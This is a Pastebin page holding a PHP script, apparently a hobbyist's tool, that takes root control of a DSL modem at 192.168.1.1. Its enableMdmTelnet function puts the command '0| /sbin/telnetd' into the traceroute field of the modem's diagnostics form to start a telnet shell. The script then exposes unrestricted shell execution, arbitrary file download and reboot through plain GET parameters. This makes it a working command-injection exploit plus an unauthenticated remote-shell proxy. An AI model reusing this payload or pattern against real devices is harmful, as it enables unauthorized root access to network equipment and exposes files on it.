API tools faq
paste
Guest User

Untitled

a guest
Jan 21st, 2019
172
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.17 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $mdmip = '192.168.1.1';
  3.  
  4. foreach ($_GET as $k => $v) {
  5.     if ($k == 'reboot') {
  6.         header('Content-type: text/plain');
  7.         echo executeMdmShellCmd('reboot');
  8.     }
  9.     if ($k == 'shellcmd') {
  10.         header('Content-type: text/plain');
  11.         echo executeMdmShellCmd($v);
  12.     }
  13.     if ($k == 'resync') {
  14.         header('Content-type: text/plain');
  15.         echo mdmDSLCPECmd('g997pmsft 3');
  16.         sleep(10);
  17.         echo mdmDSLCPECmd('g997pmsft 0');
  18.     }
  19.     if ($k == 'download') {
  20.         $f = split("/",$v);
  21.         $fn = $f[(count($f)-1)];
  22.         if (strpos($fn,'.') == '') {
  23.             $fn .= ".bin";
  24.         }
  25.         $data = executeMdmShellCmd('cat "'.$v.'"');
  26.         if (strlen($data) > 0) {
  27.             header('Content-Disposition: attachment; filename="'.$fn.'"');
  28.             header('Content-length: '.strlen($data));
  29.             echo $data;
  30.         }
  31.     }
  32. }
  33.  
  34. function mdmDSLCPECmd($c) {
  35.     executeMdmShellCmd('echo "'.$c.'" > /tmp/pipe/dsl_cpe0_cmd');
  36.     sleep(1);
  37.     return executeMdmShellCmd('cat /tmp/pipe/dsl_cpe0_ack');
  38. }
  39.  
  40.  
  41. function executeMdmShellCmd($cmd) {
  42.     $i = 0;
  43.     $telnet = new Telnet();
  44.     tstart:
  45.     $i++;
  46.     // Define prompt as something unique that will not exist in any file
  47.     $myprompt = chr(174).'zshell'.chr(175).' ';
  48.  
  49.     $result = $telnet->connect('192.168.1.1','','');
  50.     if ($result != false) {
  51.         // Wait for default prompt
  52.         $telnet->setPrompt('#');
  53.         $telnet->waitPrompt();
  54.         // Prepare for new prompt
  55.         $telnet->setPrompt($myprompt);
  56.         // Set new prompt
  57.         echo $telnet->exec("PS1='".$myprompt."'");
  58.         $telnet->waitPrompt();
  59.         // Now we can execute a command
  60.         $res = $telnet->exec($cmd);
  61.         // Remove the echoed back command
  62.         $resn = split("\n",$res);
  63.         $res='';
  64.         for ($i=0;$i<count($resn);$i++) {
  65.             if ($i > 0) {
  66.                 $res .= $resn[$i]."\n";
  67.             }
  68.         }
  69.         $telnet->disconnect();
  70.         return $res;
  71.     } else {
  72.         // If telnet server is not running, enable it via exploit.
  73.         // then try to execute our command again, up to 3 times.
  74.         if ($i < 3) {
  75.             enableMdmTelnet();
  76.             sleep(2);
  77.             goto tstart;
  78.         } else {
  79.             // Failure to start telnet server, or connect to it, or whatever
  80.         }
  81.     }
  82. }
  83.  
  84. function enableMdmTelnet() {
  85.     // Using an exploit, activate the telnet server
  86.     $cmd = "/sbin/telnetd";
  87.     $passwd = $_SERVER['PHP_AUTH_PW'];
  88.  
  89.     $c['next_page'] = "/htmlV/adv_diagnostics.asp";
  90.     $c['Self_Test'] = "";
  91.     $c['Ping_ISP_Router'] = "";
  92.     $c['diag_dns'] = "";
  93.     $c['diag_ping'] = "";
  94.     $c['diag_traceroute'] = "0| ".$cmd;
  95.     $c['diag_traceroute_maxhops'] = 1;
  96.     $cf = "";
  97.     foreach ($c as $k => $v) {
  98.         $cf .= $k."=".urlencode($v)."&";
  99.     }
  100.     $cf = rtrim($cf,"&");
  101.  
  102.     // Send the command
  103.     $u = "admin:".$passwd."@192.168.1.1/goform/EventForm";
  104.     $ch = curl_init();
  105.     $timeout = 10;
  106.     curl_setopt($ch, CURLOPT_URL, $u);
  107.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  108.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  109.     curl_setopt($ch,CURLOPT_POST, 1);
  110.     curl_setopt($ch,CURLOPT_POSTFIELDS, $cf);
  111.     $data = curl_exec($ch);
  112.     curl_close($ch);
  113.  
  114.     // Give the modem a bit to process the command
  115.     sleep(2);
  116.  
  117.     // Request the form which is magically populated with the results
  118.     $u = "admin:".$passwd."@192.168.1.1".$c['next_page'];
  119.     $ch = curl_init();
  120.     $timeout = 5;
  121.     curl_setopt($ch, CURLOPT_URL, $u);
  122.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  123.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  124.     $data = curl_exec($ch);
  125.     curl_close($ch);
  126. /*
  127.     // Filter out HTML
  128.     $res = getBetween($data,"--- Trace Route Test Results ---\n","</TEXTAREA>");
  129.     // Return raw shell command result
  130.     return $res;
  131. */
  132. }
  133.  
  134. function getBetween($src,$start,$end) {
  135. $c1 = (strpos($src,$start) + strlen($start));
  136. $c2 = strpos($src,$end,$c1);
  137. return substr($src,$c1,($c2 - $c1));
  138. }
  139.  
  140. /**
  141.  * Telnet class
  142.  *
  143.  * Used to execute remote commands via telnet connection
  144.  * Usess sockets functions and fgetc() to process result
  145.  *
  146.  * All methods throw Exceptions on error
  147.  *
  148.  * Written by Dalibor Andzakovic <dali@swerve.co.nz>
  149.  * Based on the code originally written by Marc Ennaji and extended by
  150.  * Matthias Blaser <mb@adfinis.ch>
  151.  */
  152. class Telnet {
  153.     private $host;
  154.     private $port;
  155.     private $timeout;
  156.     private $socket= NULL;
  157.     private $buffer = NULL;
  158.     private $prompt;
  159.     private $errno;
  160.     private $errstr;
  161.     private $NULL;
  162.     private $DC1;
  163.     private $WILL;
  164.     private $WONT;
  165.     private $DO;
  166.     private $DONT;
  167.     private $IAC;
  168.     const TELNET_ERROR = FALSE;
  169.     const TELNET_OK = TRUE;
  170.  
  171.     /**
  172.      * Constructor. Initialises host, port and timeout parameters
  173.      * defaults to localhost port 23 (standard telnet port)
  174.      *
  175.      * @param string $host Host name or IP addres
  176.      * @param int $port TCP port number
  177.      * @param int $timeout Connection timeout in seconds
  178.      * @return void
  179.     */
  180.     public function __construct($port = '23', $timeout = 10){
  181.         global $mdmip;
  182.         $this->host = $mdmip;
  183.         $this->port = $port;
  184.         $this->timeout = $timeout;
  185.  
  186.         // set some telnet special characters
  187.         $this->NULL = chr(0);
  188.         $this->DC1 = chr(17);
  189.         $this->WILL = chr(251);
  190.         $this->WONT = chr(252);
  191.         $this->DO = chr(253);
  192.         $this->DONT = chr(254);
  193.         $this->IAC = chr(255);
  194.         $this->connect();
  195.     }
  196.  
  197.     /**
  198.      * Destructor. Cleans up socket connection and command buffer
  199.      *
  200.      * @return void
  201.      */
  202.     public function __destruct() {
  203.         // cleanup resources
  204.         $this->disconnect();
  205.         $this->buffer = NULL;
  206.     }
  207.  
  208.     /**
  209.      * Attempts connection to remote host. Returns TRUE if sucessful.
  210.      *
  211.      * @return boolean
  212.      */
  213.     public function connect(){
  214.         // check if we need to convert host to IP
  215.         if (!preg_match('/([0-9]{1,3}\\.){3,3}[0-9]{1,3}/', $this->host)) {
  216.             $ip = gethostbyname($this->host);
  217.             if($this->host == $ip){
  218.                 throw new Exception("Cannot resolve $this->host");
  219.             } else{
  220.                 $this->host = $ip;
  221.             }
  222.         }
  223.         // attempt connection
  224.         $this->socket = fsockopen($this->host, $this->port, $this->errno, $this->errstr, $this->timeout);
  225.         if (!$this->socket){
  226.             return false;
  227.         }
  228.         return self::TELNET_OK;
  229.     }
  230.  
  231.     /**
  232.      * Closes IP socket
  233.      *
  234.      * @return boolean
  235.      */
  236.     public function disconnect(){
  237.         if ($this->socket){
  238.             if (! fclose($this->socket)){
  239.                 throw new Exception("Error while closing telnet socket");
  240.             }
  241.             $this->socket = NULL;
  242.         }
  243.         return self::TELNET_OK;
  244.     }
  245.  
  246.     /**
  247.      * Executes command and returns a string with result.
  248.      * This method is a wrapper for lower level private methods
  249.      *
  250.      * @param string $command Command to execute
  251.      * @return string Command result
  252.      */
  253.     public function exec($command, $addNewLine=true) {
  254.         $this->write($command, $addNewLine);
  255.         $this->waitPrompt();
  256.         return $this->getBuffer();
  257.     }
  258.  
  259.     /**
  260.      * Attempts login to remote host.
  261.      * This method is a wrapper for lower level private methods and should be
  262.      * modified to reflect telnet implementation details like login/password
  263.      * and line prompts. Defaults to standard unix non-root prompts
  264.      *
  265.      * @param string $username Username
  266.      * @param string $password Password
  267.      * @return boolean
  268.      */
  269.     public function login($username, $password) {
  270.         try{
  271.             $this->setPrompt('ogin:');
  272.             $this->waitPrompt();
  273.             $this->write($username);
  274.             $this->setPrompt('assword:');
  275.             $this->waitPrompt();
  276.             $this->write($password);
  277.             //$this->setPrompt();
  278.             //$this->waitPrompt();
  279.         } catch(Exception $e){
  280.             throw new Exception("Login failed.");
  281.         }
  282.         return self::TELNET_OK;
  283.     }
  284.  
  285.     /**
  286.      * Sets the string of characters to respond to.
  287.      * This should be set to the last character of the command line prompt
  288.      *
  289.      * @param string $s String to respond to
  290.      * @return boolean
  291.      */
  292.     public function setPrompt($s = '$'){
  293.         $this->prompt = $s;
  294.         return self::TELNET_OK;
  295.     }
  296.  
  297.     /**
  298.      * Gets character from the socket
  299.      *
  300.      * @return void
  301.      */
  302.     private function getc() {
  303.         return fgetc($this->socket);
  304.     }
  305.  
  306.     /**
  307.      * Clears internal command buffer
  308.      *
  309.      * @return void
  310.      */
  311.     private function clearBuffer() {
  312.         $this->buffer = '';
  313.     }
  314.  
  315.     /**
  316.      * Reads characters from the socket and adds them to command buffer.
  317.      * Handles telnet control characters. Stops when prompt is ecountered.
  318.      *
  319.      * @param string $prompt
  320.      * @return boolean
  321.      */
  322.     private function readTo($prompt){
  323.         if (!$this->socket){
  324.             throw new Exception("Telnet connection closed");
  325.         }
  326.         // clear the buffer
  327.         $this->clearBuffer();
  328.         do{
  329.             $c = $this->getc();
  330.             if ($c === false){
  331.                 throw new Exception("Couldn't find the requested : '" . $prompt . "', it was not in the data returned from server : '" . $buf . "'");
  332.             }
  333.             // Interpreted As Command
  334.             if ($c == $this->IAC) {
  335.                 if ($this->negotiateTelnetOptions()){
  336.                     continue;
  337.                 }
  338.             }
  339.             // append current char to global buffer
  340.             $this->buffer .= $c;
  341.             // we've encountered the prompt. Break out of the loop
  342.             if ((substr($this->buffer, strlen($this->buffer) - strlen($prompt))) == $prompt){
  343.                 return self::TELNET_OK;
  344.             }
  345.         } while($c != $this->NULL || $c != $this->DC1);
  346.     }
  347.  
  348.     /**
  349.      * Write command to a socket
  350.      *
  351.      * @param string $buffer Stuff to write to socket
  352.      * @param boolean $addNewLine Default true, adds newline to the command
  353.      * @return boolean
  354.      */
  355.     public function write($buffer, $addNewLine=true){
  356.         if (!$this->socket){
  357.             throw new Exception("Telnet connection closed");
  358.         }
  359.         // clear buffer from last command
  360.         $this->clearBuffer();
  361.         if ($addNewLine == true){
  362.             $buffer .= "\n";
  363.         }
  364.         if (!fwrite($this->socket, $buffer) < 0){
  365.             throw new Exception("Error writing to socket");
  366.         }
  367.         return self::TELNET_OK;
  368.     }
  369.  
  370.     /**
  371.      * Returns the content of the command buffer
  372.      *
  373.      * @return string Content of the command buffer
  374.      */
  375.     private function getBuffer(){
  376.         // cut last line (is always prompt)
  377.         $buf = explode("\n", $this->buffer);
  378.         unset($buf[count($buf)-1]);
  379.         $buf = implode("\n",$buf);
  380.         return trim($buf);
  381.     }
  382.  
  383.     /**
  384.      * Telnet control character magic
  385.      *
  386.      * @param string $command Character to check
  387.      * @return boolean
  388.      */
  389.     private function negotiateTelnetOptions(){
  390.         $c = $this->getc();
  391.         if ($c != $this->IAC){
  392.             if (($c == $this->DO) || ($c == $this->DONT)){
  393.                 $opt = $this->getc();
  394.                 fwrite($this->socket, $this->IAC . $this->WONT . $opt);
  395.             } else if (($c == $this->WILL) || ($c == $this->WONT)) {
  396.                 $opt = $this->getc();
  397.                 fwrite($this->socket, $this->IAC . $this->DONT . $opt);
  398.             } else {
  399.                 throw new Exception('Error: unknown control character ' . ord($c ));
  400.             }
  401.         } else{
  402.             throw new Exception('Error: Something Wicked Happened');
  403.         }
  404.         return self::TELNET_OK;
  405.     }
  406.  
  407.     /**
  408.      * Reads socket until prompt is encountered
  409.      */
  410.     public function waitPrompt($prompt=null){
  411.         if (!$prompt) $prompt = $this->prompt;
  412.             return $this->readTo($prompt);
  413.     }
  414. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!